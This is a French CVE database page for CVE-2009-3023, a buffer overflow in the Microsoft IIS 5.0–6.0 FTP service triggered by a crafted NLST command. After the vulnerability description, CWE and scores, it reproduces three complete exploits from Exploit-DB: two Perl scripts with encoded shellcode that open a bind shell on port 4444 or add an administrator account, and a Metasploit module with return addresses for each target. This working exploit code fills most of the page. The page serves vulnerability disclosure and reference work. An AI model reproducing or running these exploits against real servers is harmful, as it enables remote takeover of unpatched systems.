CVE-2009-3023 : Détail

CVE-2009-3023

Overflow
97.01%V3
Network
2009-08-31
18h00 +00:00
2018-10-12
17h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Buffer overflow in the FTP Service in Microsoft Internet Information Services (IIS) 5.0 through 6.0 allows remote authenticated users to execute arbitrary code via a crafted NLST (NAME LIST) command that uses wildcards, leading to memory corruption, aka "IIS FTP Service RCE and DoS Vulnerability."

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-120 Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')
The product copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 9 AV:N/AC:L/Au:S/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 9559

Date de publication : 2009-08-31 22h00 +00:00
Auteur : muts
EDB Vérifié : Yes

#!/usr/bin/perl # IIS 5.0 FTP Server / Remote SYSTEM exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2<at>googlemail.com # Affects IIS6 with stack cookie protection # Modded by muts, additional egghunter added for secondary larger payload # Might take a minute or two for the egg to be found. # Opens bind shell on port 4444 # http://www.offensive-security.com/0day/msftp.pl.txt use IO::Socket; $|=1; $sc = "\x89\xe2\xdd\xc5\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" . "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" . "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" . "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" . "\x50\x38\x41\x43\x4a\x4a\x49\x45\x36\x4d\x51\x48\x4a\x4b\x4f" . "\x44\x4f\x47\x32\x46\x32\x42\x4a\x43\x32\x46\x38\x48\x4d\x46" . "\x4e\x47\x4c\x45\x55\x51\x4a\x44\x34\x4a\x4f\x48\x38\x46\x34" . "\x50\x30\x46\x50\x50\x57\x4c\x4b\x4b\x4a\x4e\x4f\x44\x35\x4a" . "\x4a\x4e\x4f\x43\x45\x4b\x57\x4b\x4f\x4d\x37\x41\x41"; # ./msfpayload windows/shell_bind_tcp R | ./msfencode -e x86/shikata_ga_nai -b "\x00\x0a\x0d" $shell="T00WT00W" ."\xda\xde\xbd\x2d\xe7\x9b\x9f\x2b\xc9\xb1\x56\xd9\x74\x24\xf4" . "\x5a\x83\xea\xfc\x31\x6a\x15\x03\x6a\x15\xcf\x12\x67\x77\x86" . "\xdd\x98\x88\xf8\x54\x7d\xb9\x2a\x02\xf5\xe8\xfa\x40\x5b\x01" . "\x71\x04\x48\x92\xf7\x81\x7f\x13\xbd\xf7\x4e\xa4\x70\x38\x1c" . "\x66\x13\xc4\x5f\xbb\xf3\xf5\xaf\xce\xf2\x32\xcd\x21\xa6\xeb" . "\x99\x90\x56\x9f\xdc\x28\x57\x4f\x6b\x10\x2f\xea\xac\xe5\x85" . "\xf5\xfc\x56\x92\xbe\xe4\xdd\xfc\x1e\x14\x31\x1f\x62\x5f\x3e" . "\xeb\x10\x5e\x96\x22\xd8\x50\xd6\xe8\xe7\x5c\xdb\xf1\x20\x5a" . "\x04\x84\x5a\x98\xb9\x9e\x98\xe2\x65\x2b\x3d\x44\xed\x8b\xe5" . "\x74\x22\x4d\x6d\x7a\x8f\x1a\x29\x9f\x0e\xcf\x41\x9b\x9b\xee" . "\x85\x2d\xdf\xd4\x01\x75\xbb\x75\x13\xd3\x6a\x8a\x43\xbb\xd3" . "\x2e\x0f\x2e\x07\x48\x52\x27\xe4\x66\x6d\xb7\x62\xf1\x1e\x85" . "\x2d\xa9\x88\xa5\xa6\x77\x4e\xc9\x9c\xcf\xc0\x34\x1f\x2f\xc8" . "\xf2\x4b\x7f\x62\xd2\xf3\x14\x72\xdb\x21\xba\x22\x73\x9a\x7a" . "\x93\x33\x4a\x12\xf9\xbb\xb5\x02\x02\x16\xc0\x05\xcc\x42\x80" . "\xe1\x2d\x75\x36\xad\xb8\x93\x52\x5d\xed\x0c\xcb\x9f\xca\x84" . "\x6c\xe0\x38\xb9\x25\x76\x74\xd7\xf2\x79\x85\xfd\x50\xd6\x2d" . "\x96\x22\x34\xea\x87\x34\x11\x5a\xc1\x0c\xf1\x10\xbf\xdf\x60" . "\x24\xea\x88\x01\xb7\x71\x49\x4c\xa4\x2d\x1e\x19\x1a\x24\xca" . "\xb7\x05\x9e\xe9\x4a\xd3\xd9\xaa\x90\x20\xe7\x33\x55\x1c\xc3" . "\x23\xa3\x9d\x4f\x10\x7b\xc8\x19\xce\x3d\xa2\xeb\xb8\x97\x19" . "\xa2\x2c\x6e\x52\x75\x2b\x6f\xbf\x03\xd3\xc1\x16\x52\xeb\xed" . "\xfe\x52\x94\x10\x9f\x9d\x4f\x91\xbf\x7f\x5a\xef\x57\x26\x0f" . "\x52\x3a\xd9\xe5\x90\x43\x5a\x0c\x68\xb0\x42\x65\x6d\xfc\xc4" . "\x95\x1f\x6d\xa1\x99\x8c\x8e\xe0\x90"; print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n"; if ($#ARGV ne 1) { print "usage: iiz5.pl <target> <your local ip>\n"; exit(0); } srand(time()); $port = int(rand(31337-1022)) + 1025; $locip = $ARGV[1]; $locip =~ s/\./,/gi; if (fork()) { $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '21', Proto => 'tcp'); $patch = "\x7E\xF1\xFA\x7F"; $retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms $v = "KSEXY" . $sc . "V" x (500-length($sc)-5); # top address of stack frame where shellcode resides, is hardcoded inside this block $findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53" ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0"; # attack buffer $c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. "HHHHIIII". $patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN"; $x = <$sock>; print $x; print $sock "USER anonimoos\r\n"; $x = <$sock>; print $x; print $sock "PASS $shell\r\n"; $x = <$sock>; print $x; print $sock "USER anonimoos\r\n"; $x = <$sock>; print $x; print $sock "PASS $shell\r\n"; $x = <$sock>; print $x; print $sock "USER anonymous\r\n"; $x = <$sock>; print $x; print $sock "PASS anonymous\r\n"; $x = <$sock>; print $x; print $sock "MKD w00t$port\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack) $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "CWD w00t$port\r\n"; $x = <$sock>; print $x; print $sock "MKD CCC". "$c\r\n"; $x = <$sock>; print $x; print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; $x = <$sock>; print $x; # TRIGGER print $sock "NLST $c*/../C*/\r\n"; $x = <$sock>; print $x; while (1) {} } else { my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); die "Could not create socket: $!\n" unless $servsock; my $new_sock = $servsock->accept(); while(<$new_sock>) { print $_; } close($servsock); } #Cheerio, # #Kingcope # milw0rm.com [2009-09-01]
Exploit Database EDB-ID : 9541

Date de publication : 2009-08-30 22h00 +00:00
Auteur : kingcope
EDB Vérifié : Yes

# IIS 5.0 FTPd / Remote r00t exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2<at>googlemail.com # Affects IIS6 with stack cookie protection # August 2009 - KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; #metasploit shellcode, adduser "winown:nwoniw" $sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" . "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" . "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" . "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" . "\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" . "\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" . "\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" . "\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" . "\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" . "\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" . "\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" . "\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" . "\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" . "\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" . "\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" . "\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" . "\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" . "\x4e\x4d\x4c\x4b\x42\x48\x45\x58\x4d\x59\x4a\x58\x4c\x43" . "\x49\x50\x43\x5a\x46\x30\x43\x58\x4c\x30\x4c\x4a\x44\x44" . "\x51\x4f\x43\x58\x4a\x38\x4b\x4e\x4d\x5a\x44\x4e\x50\x57" . "\x4b\x4f\x4a\x47\x42\x43\x42\x4d\x45\x34\x46\x4e\x42\x45" . "\x44\x38\x43\x55\x47\x50\x46\x4f\x45\x33\x47\x50\x42\x4e" . "\x42\x45\x43\x44\x51\x30\x44\x35\x44\x33\x45\x35\x44\x32" . "\x51\x30\x43\x47\x43\x59\x42\x4e\x42\x4f\x43\x47\x42\x4e" . "\x51\x30\x42\x4e\x44\x37\x42\x4f\x42\x4e\x45\x39\x43\x47" . "\x47\x50\x46\x4f\x51\x51\x50\x44\x47\x34\x51\x30\x46\x46" . "\x51\x36\x51\x30\x42\x4e\x42\x45\x44\x34\x51\x30\x42\x4c" . "\x42\x4f\x43\x53\x45\x31\x42\x4c\x42\x47\x43\x42\x42\x4f" . "\x43\x45\x42\x50\x47\x50\x47\x31\x42\x44\x42\x4d\x45\x39" . "\x42\x4e\x42\x49\x42\x53\x43\x44\x43\x42\x45\x31\x44\x34" . "\x42\x4f\x43\x42\x43\x43\x47\x50\x42\x57\x45\x39\x42\x4e" . "\x42\x4f\x42\x57\x42\x4e\x47\x50\x46\x4f\x47\x31\x51\x54" . "\x51\x54\x43\x30\x41\x41"; #1ca print "IIS 5.0 FTPd / Remote r00t exploit by kcope V1.2\n"; if ($#ARGV ne 1) { print "usage: iiz5.pl <target> <your local ip>\n"; exit(0); } srand(time()); $port = int(rand(31337-1022)) + 1025; $locip = $ARGV[1]; $locip =~ s/\./,/gi; if (fork()) { $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => '21', Proto => 'tcp'); $patch = "\x7E\xF1\xFA\x7F"; #$retaddr = "ZZZZ"; $retaddr = "\x9B\xB1\xF4\x77"; # JMP ESP univ on 2 win2k platforms $v = "KSEXY" . $sc . "V" x (500-length($sc)-5); # top address of stack frame where shellcode resides, is hardcoded inside this block $findsc="\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38\x53" ."\x45\x58\x59\x75\xF7\x40\x40\x40\x40\xFF\xFF\xE0"; # attack buffer $c = $findsc . "C" . ($patch x (76/4)) . $patch.$patch. ($patch x (52/4)) .$patch."EEEE$retaddr".$patch. "HHHHIIII". $patch."JKKK"."\xE9\x63\xFE\xFF\xFF\xFF\xFF"."NNNN"; $x = <$sock>; print $x; print $sock "USER anonymous\r\n"; $x = <$sock>; print $x; print $sock "PASS anonymous\r\n"; $x = <$sock>; print $x; print $sock "MKD w00t$port\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; # We store shellcode in memory of process (stack) $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "SITE $v\r\n"; $x = <$sock>; print $x; print $sock "CWD w00t$port\r\n"; $x = <$sock>; print $x; print $sock "MKD CCC". "$c\r\n"; $x = <$sock>; print $x; print $sock "PORT $locip," . int($port / 256) . "," . int($port % 256) . "\r\n"; $x = <$sock>; print $x; # TRIGGER print $sock "NLST $c*/../C*/\r\n"; $x = <$sock>; print $x; while (1) {} } else { my $servsock = IO::Socket::INET->new(LocalAddr => "0.0.0.0", LocalPort => $port, Proto => 'tcp', Listen => 1); die "Could not create socket: $!\n" unless $servsock; my $new_sock = $servsock->accept(); while(<$new_sock>) { print $_; } close($servsock); } #Cheerio, # #Kingcope # milw0rm.com [2009-08-31]
Exploit Database EDB-ID : 16740

Date de publication : 2010-11-11 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes

## # $Id: ms09_053_ftpd_nlst.rb 11003 2010-11-12 06:19:49Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Ftp def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft IIS FTP Server NLST Response Overflow', 'Description' => %q{ This module exploits a stack buffer overflow flaw in the Microsoft IIS FTP service. The flaw is triggered when a special NLST argument is passed while the session has changed into a long directory path. For this exploit to work, the FTP server must be configured to allow write access to the file system (either anonymously or in conjunction with a real account) }, 'Author' => [ 'Kingcope <kcope2[at]googlemail.com>', 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 11003 $', 'References' => [ ['URL', 'http://milw0rm.com/exploits/9541'], ['CVE', '2009-3023'], ['OSVDB', '57589'], ['BID', '36189'], ['MSB', 'MS09-053'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Privileged' => true, 'Payload' => { 'Space' => 490, 'BadChars' => "\x00\x09\x0c\x20\x0a\x0d\x0b", # This is for the stored payload, the real BadChar list for file paths is: # \x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x22\x2a\x2e\x2f\x3a\x3c\x3e\x3f\x5c\x7c 'StackAdjustment' => -3500, }, 'Platform' => [ 'win' ], 'Targets' => [ [ 'Windows 2000 SP4 English/Italian (IIS 5.0)', { 'Ret' => 0x773d24eb, # jmp esp in activeds.dll (English / 5.0.2195.6601) 'Patch' => 0x7ffd7ffd # works for off-by-two alignment }, ], [ 'Windows 2000 SP3 English (IIS 5.0)', { 'Ret' => 0x77e42ed8, # jmp esp in user32.dll (English / 5.0.2195.7032) 'Patch' => 0x7ffd7ffd # works for off-by-two alignment }, ], [ # target from TomokiSanaki 'Windows 2000 SP0-SP3 Japanese (IIS 5.0)', { 'Ret' => 0x774fa593, # jmp esp in ?? (Japanese) 'Patch' => 0x7ffd7ffd # works for off-by-two alignment }, ], ], 'DisclosureDate' => 'Aug 31 2009', 'DefaultTarget' => 0)) register_options([Opt::RPORT(21),], self.class) end def exploit connect_login based = rand_text_alpha_upper(10) res = send_cmd( ['MKD', based ], true ) print_status(res.strip) if (res !~ /directory created/) print_error("The root directory of the FTP server is not writeable") disconnect return end res = send_cmd( ['CWD', based ], true ) print_status(res.strip) egg = rand_text_alpha_upper(4) hun = "\xB8\x55\x55\x52\x55\x35\x55\x55\x55\x55\x40\x81\x38#{egg}\x75\xF7\x40\x40\x40\x40\xFF\xE0" # This egg hunter is necessary because of the huge set of restricted characters for directory names # The best that metasploit could so was 133 bytes for an alphanum encoded egg hunter # The egg hunter above was written by kcope and searches from 0x70000 forward (stack) in order # to locate the real shellcode. The only change from the original hunter was to randomize the # prefix used. # Store our real shellcode on the stack 1.upto(5) do res = send_cmd( ['SITE', egg + payload.encoded.gsub("\xff", "\xff\xff") ], true ) end # Create the directory path that will be used in the overflow pre = rand_text_alpha_upper(3) # esp+0x28 points here pst = rand_text_alpha_upper(210) # limited by max path pst[ 0, hun.length] = hun # egg hunter pst[ 90, 4] = [target['Patch']].pack('V') # patch smashed pointers pst[ 94, 4] = [target['Patch']].pack('V') # patch smashed pointers pst[140, 32] = [target['Patch']].pack('V') * 8 # patch smashed pointers pst[158, 4] = [target.ret].pack("V") # return pst[182, 5] = "\xe9" + [-410].pack("V") # jmp back # Escape each 0xff with another 0xff for FTP pst = pst.gsub("\xff", "\xff\xff") print_status("Creating long directory...") res = send_cmd( ['MKD', pre+pst ], true ) print_status(res.strip) srv = Rex::Socket::TcpServer.create( 'LocalHost' => '0.0.0.0', 'LocalPort' => 0, 'SSL' => false, 'Context' => { 'Msf' => framework, 'MsfExploit' => self, } ) add_socket(srv) begin thr = framework.threads.spawn("Module(#{self.refname})-Listener", false) { srv.accept } prt = srv.getsockname[2] prt1 = prt / 256 prt2 = prt % 256 addr = Rex::Socket.source_address(rhost).gsub(".", ",") + ",#{prt1},#{prt2}" res = send_cmd( ['PORT', addr ], true ) print_status(res.strip) print_status("Trying target #{target.name}...") res = send_cmd( ['NLST', pre+pst + "*/../" + pre + "*/"], true ) print_status(res.strip) if res select(nil,nil,nil,2) handler disconnect ensure thr.kill srv.close end end end

Products Mentioned

Configuraton 0

Microsoft>>Internet_information_server >> Version From (including) 5.0 To (including) 6.0

Microsoft>>Windows_2000 >> Version -

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_server_2003 >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Microsoft>>Windows_xp >> Version -

Configuraton 0

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_server_2008 >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_vista >> Version -

    Microsoft>>Windows_vista >> Version -

    Références

    http://www.securityfocus.com/bid/36189
    Tags : vdb-entry, x_refsource_BID
    http://www.exploit-db.com/exploits/9541
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.us-cert.gov/cas/techalerts/TA09-286A.html
    Tags : third-party-advisory, x_refsource_CERT
    http://www.vupen.com/english/advisories/2009/2481
    Tags : vdb-entry, x_refsource_VUPEN
    http://www.exploit-db.com/exploits/9559
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.kb.cert.org/vuls/id/276653
    Tags : third-party-advisory, x_refsource_CERT-VN